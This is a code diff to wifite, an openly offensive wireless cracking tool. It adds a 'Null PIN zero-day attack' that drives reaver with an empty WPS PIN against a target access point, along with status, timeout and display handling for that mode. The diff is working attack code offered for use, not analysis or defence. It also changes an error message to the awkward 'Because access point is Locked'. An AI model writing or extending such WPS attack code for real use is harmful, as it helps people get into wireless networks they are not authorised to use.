diff --git a/wifite/attack/all.py b/wifite/attack/all.py index 6db4d3718..cfaea01c3 100755 --- a/wifite/attack/all.py +++ b/wifite/attack/all.py @@ -64,6 +64,10 @@ def attack_single(cls, target, targets_remaining): if Configuration.wps_pixie: attacks.append(AttackWPS(target, pixie_dust=True)) + # Null PIN zero-day attack + if Configuration.wps_pin: + attacks.append(AttackWPS(target, pixie_dust=False, null_pin=True)) + # PIN attack if Configuration.wps_pin: attacks.append(AttackWPS(target, pixie_dust=False)) diff --git a/wifite/attack/wps.py b/wifite/attack/wps.py index ca4169c88..c9f873a3c 100755 --- a/wifite/attack/wps.py +++ b/wifite/attack/wps.py @@ -14,11 +14,12 @@ class AttackWPS(Attack): def can_attack_wps(): return Reaver.exists() or Bully.exists() - def __init__(self, target, pixie_dust=False): + def __init__(self, target, pixie_dust=False, null_pin=False): super(AttackWPS, self).__init__(target) self.success = False self.crack_result = None self.pixie_dust = pixie_dust + self.null_pin = null_pin def run(self): ''' Run all WPS-related attacks ''' @@ -78,7 +79,7 @@ def run_bully(self): def run_reaver(self): - reaver = Reaver(self.target, pixie_dust=self.pixie_dust) + reaver = Reaver(self.target, pixie_dust=self.pixie_dust, null_pin=self.null_pin) reaver.run() self.crack_result = reaver.crack_result self.success = self.crack_result is not None diff --git a/wifite/tools/reaver.py b/wifite/tools/reaver.py index 3ff11a04a..e8b8b8440 100755 --- a/wifite/tools/reaver.py +++ b/wifite/tools/reaver.py @@ -18,10 +18,11 @@ class Reaver(Attack, Dependency): dependency_name = 'reaver' dependency_url = 'https://github.com/t6x/reaver-wps-fork-t6x' - def __init__(self, target, pixie_dust=True): + def __init__(self, target, pixie_dust=True, null_pin=False): super(Reaver, self).__init__(target) self.pixie_dust = pixie_dust + self.null_pin = null_pin self.progress = '0.00%' self.state = 'Initializing' @@ -51,6 +52,9 @@ def __init__(self, target, pixie_dust=True): if pixie_dust: self.reaver_cmd.extend(['--pixie-dust', '1']) + if null_pin: + self.reaver_cmd.extend(['-p', '']) + self.reaver_proc = None @staticmethod @@ -117,7 +121,7 @@ def _run(self): # Check if locked if self.locked and not Configuration.wps_ignore_lock: - raise Exception('{O}Access point is {R}Locked{W}') + raise Exception('{O}Because access point is {R}Locked{W}') time.sleep(0.5) @@ -134,7 +138,7 @@ def _run(self): def get_status(self): - if self.pixie_dust: + if self.pixie_dust or self.null_pin: main_status = '' else: # Include percentage @@ -206,6 +210,9 @@ def parse_failure(self, stdout): if self.pixie_dust and self.running_time() > Configuration.wps_pixie_timeout: raise Exception('Timeout after %d seconds' % Configuration.wps_pixie_timeout) + if self.null_pin and self.running_time() > Configuration.wps_pixie_timeout: + raise Exception('Timeout after %d seconds' % Configuration.wps_pixie_timeout) + # WPSFail count self.total_wpsfails = stdout.count('WPS transaction failed') if self.total_wpsfails >= Configuration.wps_fail_threshold: @@ -297,12 +304,16 @@ def pattack(self, message, newline=False): time_left = Configuration.wps_pixie_timeout - self.running_time() time_msg = '{O}%s{W}' % Timer.secs_to_str(time_left) attack_name = 'Pixie-Dust' + elif self.null_pin: + time_left = Configuration.wps_pixie_timeout - self.running_time() + time_msg = '{O}%s{W}' % Timer.secs_to_str(time_left) + attack_name = 'NULL PIN' else: time_left = self.running_time() time_msg = '{C}%s{W}' % Timer.secs_to_str(time_left) attack_name = 'PIN Attack' - if self.total_attempts > 0 and not self.pixie_dust: + if self.total_attempts > 0 and not self.pixie_dust and not self.null_pin: time_msg += ' {D}PINs:{W}{C}%d{W}' % self.total_attempts Color.clear_entire_line()